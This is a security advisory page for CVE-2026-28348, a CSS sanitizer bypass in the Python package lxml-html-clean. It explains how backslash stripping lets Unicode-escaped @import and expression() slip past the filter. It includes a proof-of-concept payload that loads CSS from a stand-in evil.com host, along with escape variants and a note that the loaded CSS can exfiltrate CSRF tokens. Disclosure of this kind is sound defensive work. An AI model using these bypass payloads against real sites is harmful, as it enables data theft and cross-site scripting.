GHSA-HW26-MMPG-FQFG

Vulnerability from github – Published: 2026-03-02 19:19 – Updated: 2026-03-05 22:49
VLAI?
Summary
lxml-html-clean has CSS @import Filter Bypass via Unicode Escapes
Details

Summary

The _has_sneaky_javascript() method strips backslashes before checking for dangerous CSS keywords. This causes CSS Unicode escape sequences to bypass the @import and expression() filters, allowing external CSS loading or XSS in older browsers.

Details

The root cause is located in clean.py (around line 594):

style = style.replace('\\', '')

This transformation changes a payload like @\69mport into @69mport. This resulting string does NOT match the blacklist keyword @import. However, all modern browsers' CSS parsers decode \69 as the character 'i' (hex 69) according to CSS spec section 4.3.7, interpreting @\69mport as a valid @import statement.

Same root cause bypasses expression() detection: \65xpression(alert(1)) passes through (IE only).

PoC

from lxml_html_clean import clean_html

# Normal @import is correctly blocked:
# clean_html('<style>@import url("http://evil.com/x.css");</style>')
# Output: <div><style> url("http://evil.com/x.css");</style></div>

# Unicode escape bypass:
result = clean_html('<style>@\\69mport url("http://evil.com/x.css");</style>')
print(result)
# Output: <div><style>@\69mport url("http://evil.com/x.css");</style></div>

If rendered in a browser, the browser loads the external CSS. Variants like @\0069mport, @\69 mport (trailing space), and @\49mport (uppercase I) also work.

Impact

External CSS loading enables data exfiltration via attribute selectors (e.g., reading CSRF tokens), UI redressing, and phishing. In older browsers (IE), this allows for full XSS via expression().

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.4.3"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "lxml-html-clean"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.4.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28348"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-02T19:19:15Z",
    "nvd_published_at": "2026-03-05T20:16:16Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe `_has_sneaky_javascript()` method strips backslashes before checking for dangerous CSS keywords. This causes CSS Unicode escape sequences to bypass the `@import` and `expression()` filters, allowing external CSS loading or XSS in older browsers.\n\n### Details\nThe root cause is located in `clean.py` (around line 594):\n```python\nstyle = style.replace(\u0027\\\\\u0027, \u0027\u0027)\n```\nThis transformation changes a payload like `@\\69mport` into `@69mport`. This resulting string does NOT match the blacklist keyword `@import`. However, all modern browsers\u0027 CSS parsers decode `\\69` as the character \u0027i\u0027 (hex 69) according to CSS spec section 4.3.7, interpreting `@\\69mport` as a valid `@import` statement.\n\nSame root cause bypasses `expression()` detection: `\\65xpression(alert(1))` passes through (IE only).\n\n### PoC\n```python\nfrom lxml_html_clean import clean_html\n\n# Normal @import is correctly blocked:\n# clean_html(\u0027\u003cstyle\u003e@import url(\"http://evil.com/x.css\");\u003c/style\u003e\u0027)\n# Output: \u003cdiv\u003e\u003cstyle\u003e url(\"http://evil.com/x.css\");\u003c/style\u003e\u003c/div\u003e\n\n# Unicode escape bypass:\nresult = clean_html(\u0027\u003cstyle\u003e@\\\\69mport url(\"http://evil.com/x.css\");\u003c/style\u003e\u0027)\nprint(result)\n# Output: \u003cdiv\u003e\u003cstyle\u003e@\\69mport url(\"http://evil.com/x.css\");\u003c/style\u003e\u003c/div\u003e\n```\nIf rendered in a browser, the browser loads the external CSS. Variants like `@\\0069mport`, `@\\69 mport` (trailing space), and `@\\49mport` (uppercase I) also work.\n\n### Impact\nExternal CSS loading enables data exfiltration via attribute selectors (e.g., reading CSRF tokens), UI redressing, and phishing. In older browsers (IE), this allows for full XSS via `expression()`.",
  "id": "GHSA-hw26-mmpg-fqfg",
  "modified": "2026-03-05T22:49:20Z",
  "published": "2026-03-02T19:19:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fedora-python/lxml_html_clean/security/advisories/GHSA-hw26-mmpg-fqfg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28348"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedora-python/lxml_html_clean/commit/2ef732667ddbc74ea59847bcf24b75809aaeed3b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fedora-python/lxml_html_clean"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "lxml-html-clean has CSS @import Filter Bypass via Unicode Escapes"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…